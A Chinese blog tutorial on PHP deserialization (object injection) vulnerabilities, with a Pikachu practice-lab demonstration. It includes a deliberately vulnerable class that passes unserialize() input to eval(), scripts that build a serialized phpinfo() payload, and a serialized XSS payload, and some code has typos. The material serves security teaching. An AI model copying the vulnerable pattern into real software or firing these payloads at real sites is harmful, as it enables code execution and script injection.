PHP反序列化漏洞原理(附带pikachu靶场演示)

最新推荐文章于 2024-07-25 14:53:17 发布
最新推荐文章于 2024-07-25 14:53:17 发布
阅读量1k 收藏 22
点赞数 29
分类专栏: 基础web漏洞学习 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69043895/article/details/137922808
版权

1.反序列化概念

  1. 序列化:是将变量转换为可保存或传输的字符串的过程;实现函数是serialize()
  2. 反序列化:就是在适当的时候把这个字符串再转化成原来的变量使用,就是序列化的逆过程。实现函数是unserialize()

直白一点就是:序列化是把对象转换成字节流,反序列化就是为了恢复到之前的状态,把字节流转换成对象的过程。

序列化数据格式

数据类型

序列化格式

解释

整数

i:42;

表示整数值为42

浮点数

d:3.14;

表示浮点数值为3.14

字符串

s:5:"hello";

表示字符串长度为5,内容为"hello"

空字符串

s:0:"";

表示一个空字符串

数组

a:3:{i:0;s:5:"apple";i:1;s:6:"banana";i:2;s:5:"cherry";}

表示包含3个元素的数组

关联数组(对象)

O:8:"stdClass":2:{s:4:"name";s:5:"Alice";s:3:"age";i:30;}

表示一个包含两个属性的对象

布尔值

b:1;b:0;

表示真(true)或假(false)

NULL

N;

表示空值

这个表格更详细地列出了各种数据类型在PHP中的序列化格式和相应的解释。

举个详细的例子:

输出结果:

O:8:"examlple":5:{s:6:"string";s:4:"test";s:17:" examlple integer";s:1:"1";s:7:" * null";s:4:"null";s:6:"double";s:3:"1.2";s:4:"bool";s:4:"True";}

反序列化漏洞

反序列化漏洞:也叫对象注入,就是当程序在进行反序列化时,会自动调用一些函数,但是如果传入函数的参数可以被用户控制的话,用户可以输入一些恶意代码到函数中,从而导致反序列化漏洞。

可以理解为程序在执行unserialize()函数是,自动执行了某些魔术方法(magic method),而魔术方法的参数被用户所控制(通过控制属性来控制参数),这就会产生安全问题。

漏洞利用条件:

  1. unserialize()函数的参数可控。
  2. 存在可利用的魔术方法。

属性赋值

要利用反序列化漏洞,必须向unserialize()函数传入构造的序列化数据(定义合适的属性值)。那么,如

何构造序列化数据呢?

<?php
show_source( __FILE__);
error_reporting(0);
class DEMO{
public $func;
public $arg ;
public function safe(){
echo $this->arg;
}
public function evi0{
eval($this->arg);
}
public function run(){
$this->{$this->func}();
}
function_construct(){
$this->func ='evil';
}
}
$obj=unserialize($_GET['a']);
$obj->run();
?>

直接写序列化数据显示是不合适的,因为序列化数据不符合人类直观,很容易出错。实际上,都是利用serialize()函数来生成序列化数据的。

生成步骤:

  1. 把题目代码复制到本地;
  2. 注释掉与属性无关的内容(方法和没用的代码);
  3. 对属性赋值;
  4. 输出ur编码后的序列化数据:
  5. 将序列化数据发送到目标服务器。

进行URL编码的原因:

  1. 原始的序列化数据可能存在不可见字符;
  2. 如果不进行编码,最后输出的结果是片段的,不是全部的,会有类似截断导致结果异常,所以需要进行ur编码。

属性赋值的三种方法:

  1. 直接在属性中赋值:优点是方便,缺点是只能赋值字符串
<?phpClasS DEMO{
public $func='evi1';
public $arg='phpinfo();';
# public function safe(){
# echo $this->arg;
# }
# public function evil(){	
# eval($this->arg);
#}
# public function run(){
# $this->{$this->func}();
# }
#function_construct(){
# $this->func ='evil]':
# }
}
# $obj=unserialize($_GET['a']);
# $obj->run();
echo(urlencode(serialize(new DEMO())));
?>

2.外部赋值:优点是可以赋值任意类型的值,缺点是只能操作public属性。

<?php
Class DEMO{
public $func;
public $arg ;
}
$o = neW DEMO();
$o->func ='evil';
$o->arg ='phpinfo();';
echo(urlencode(serialize($o)));

3.构造方法赋值(万能方法):优点是解决了上述的全部缺点,缺点是有点麻烦

<?phpClass DEMO{
public $func;
public $arg ;
function_construct(){
$this->func ='evil';
$this->arg='phpinfo();';
}
}
$o = new DEMO();
echo(urlencode(serialize($o)));

魔术方法

魔术方法是一种特殊的方法,在某些情况下会自动调用。魔术方法的命名是以两个下划线开头的,常见

的魔术方法有:

漏洞利用

此处以pikachu为例

输入一个正常的序列化数据O:1:"S":1:{s:4:"test";s:7:"pikachu";}

输入构造好的xss

O:1:"S":1:{s:4:"test";s:30:"<script>alert('11')</script>";}

成功弹框

nuc_ddddsj
关注
  • 29
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
PHP反序列化漏洞——漏洞原理及防御措施
cldimd的博客
03-20 6788
序列化 将对象转换成字符串 反序列化 将特定格式的字符串转换成对象 什么是反序列化漏洞 PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可...
反序列化漏洞原理靶场实践
09-26
反序列化漏洞原理靶场实践 序列化和反序列化PHP 中两个基本概念。序列化是将对象的状态信息转换为可以存储或传输的形式的过程,而反序列化是将存储的状态信息重新转换为对象的过程。 序列化的过程可以将对象...
Pikachu 靶场 PHP 反序列化漏洞通关解析
Flag少侠的博客
05-17 2373
PHP反序列化漏洞是指在PHP应用程序中存在的安全漏洞,攻击者可以利用该漏洞通过精心构造的恶意序列化数据来执行恶意代码或实现未授权的操作。这种漏洞可能导致远程代码执行、敏感信息泄露、服务器拒绝服务等安全问题。PHP中的反序列化漏洞通常与序列化和反序列化功能相关。在PHP中,序列化是将对象或数据结构转换为可传输或存储的字符串的过程,而反序列化则是将这些字符串转换回原始对象或数据结构的过程。
Pikachu靶场PHP反序列漏洞详解
m0_46467017的博客
05-31 1424
Pikachu靶场PHP反序列漏洞详解前言PHP反序列漏洞简述正式闯关代码审计 前言 本篇文章用于巩固对自己PHP反序列漏洞的学习总结,其中部分内容借鉴了以下博客。 链接: pikachu PHP反序列化(皮卡丘漏洞平台通关系列)) PHP反序列漏洞简述 在理解这个漏洞前,你需要先搞清楚php中serialize(),unserialize()这两个函数。 先跟着pikachu简单学习一下什么叫序列化和反序列化: 但其实我已知这里有3个地方写的不对,需要更正一下: (1)序列化结果中的S不是对象名称,而
Pikachu靶场通关笔记--php反序列化漏洞
weixin_45908624的博客
12-14 609
反序列化
Pikachu靶场——PHP反序列化漏洞
来日可期的博客
09-30 1842
序列化是将对象转换为字节流或其他可传输格式的过程,以便将其存储在文件中、通过网络发送或在内存中保存。反序列化是将序列化的数据重新还原为对象的过程。反序列化漏洞通常出现在不正确或不安全反序列化实现中。攻击者可以构造恶意的序列化数据,利用漏洞触发远程代码执行、拒绝服务攻击、信息泄露等安全问题。
pikachu靶场:php反序列化漏洞
一个努力学习网安的小牛马
11-27 768
另外,你也可以使用其他方法来处理序列化的数据,例如使用json_decode()函数将序列化的字符串转换为JSON格式的字符串,然后对JSON数据进行验证和处理。然而,如果序列化的数据中包含恶意代码,那么在反序列化时,这段恶意代码可能会被执行,从而带来安全风险。在这段代码中,通过POST请求接收一个序列化的字符串,并将其反序列化为一个S类的对象。如果这个序列化的字符串中包含恶意代码,那么在反序列化时,这段恶意代码可能会被执行,从而造成安全问题。的命名不够明确,不利于代码的可读性和可维护性。
php反序列化漏洞原理、利用方法、危害
白帽黑客八哥的博客
12-23 1450
PHP反序列化漏洞是一种允许攻击者通过将恶意数据反序列化PHP对象来执行任意代码的漏洞。这通常是通过向具有反序列化功能的PHP应用程序提交经过精心设计的输入来实现的。
Fastjson反序列化漏洞原理漏洞复现(基于vulhub靶场)
人若无名,便可专心练剑
03-27 2847
Fastjson反序列化漏洞也是一个知名度比较高的Java反序列化漏洞,他是阿里巴巴的开源库,下面我将主要带大家了解Fastjson反序列化漏洞原理以及相关知识点的内容,然后带师傅们去利用rmi服务去复现这个Fastjson反序列化漏洞!!!
PHP反序列化漏洞详解(万字分析、由浅入深)
热门推荐
Hardworking666的博客
01-08 1万+
文章目录一、PHP面向对象编程二、PHP序列化和反序列化三、PHP反序列化漏洞原理 一、PHP面向对象编程 在面向对象的程序设计(Object-oriented programming,OOP)中,对象是一个由信息及对信息进行处理的描述所组成的整体,是对现实世界的抽象。 类是一个共享相同结构和行为的对象的集合。每个类的定义都以关键字class开头,后面跟着类的名字。 创建一个PHP类: <?php class TestClass //定义一个类 { //一个变量 public $variable ..
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
深入浅析PHP的session反序列化漏洞问题
10-19
主要介绍了PHP的session反序列化漏洞问题,需要的朋友可以参考下
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 980
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全防御【IPsec VPN搭建】
miss_copper的博客
07-25 1567
防火墙的g0/0/0口默认的IP地址为192.168.0.1/24;但是我们需要在浏览器中打开FW2的web服务就需要将g0/0/0接口的IP地址修改为192.168.142.40/24与我们Clound中虚拟网卡通一个网段才行。20、将双机热备改成主备模式,通过内网的VPN设备构建一条到达分公司的IPsec VPN通道,保证10.0.2.0/24网段可以访问到192.168.1.0/24网段。登录成功之后需要修改你的密码才能进入防火墙的用户视图。IPsec策略协商成功!成功修改为主备模式!
网络安全之不同阶段攻防手段(四)
最新发布
子非渔
07-25 825
前面已经说过信息收集、扫描探测以及初始访问阶段的攻防手段,下面将说一下在攻击者获取到访问权限的情况下会接着如何进一步在网络中建立控制点、提权、横移以及完成攻击后的遗迹隐藏
php反序列化漏洞原理
08-09
PHP反序列化漏洞是一种安全漏洞,它利用了PHP中的反序列化函数unserialize()的特性。当我们从外部接收到一个序列化的数据,并使用unserialize()函数对其进行反序列化时,如果没有进行足够的验证和过滤,恶意用户可以构造一些特定的序列化数据,导致代码执行任意的PHP代码,从而可以进行远程代码执行、文件读写等攻击。 在引用中,演示了一个简单的反序列化漏洞的例子。通过序列化一个对象并使用echo serialize()将序列化后的字符串输出,然后使用unserialize()函数对其进行反序列化,从而恶意执行了"phpinfo();"。在引用中,展示了如何利用反序列化漏洞来执行任意代码,通过构造一个私有属性并使用urlencode()函数对序列化后的字符串进行编码。在引用中,展示了如何使用unserialize()函数对序列化的字符串进行反序列化。 综上所述,PHP反序列化漏洞原理是当我们在反序列化一个恶意构造的序列化数据时,由于缺乏足够的验证和过滤,恶意用户可以通过构造特定的序列化数据来执行任意的PHP代码,从而导致安全漏洞的产生。为了防止这种漏洞的发生,我们应该对从外部接收的序列化数据进行严格的验证和过滤。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

nuc_ddddsj

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值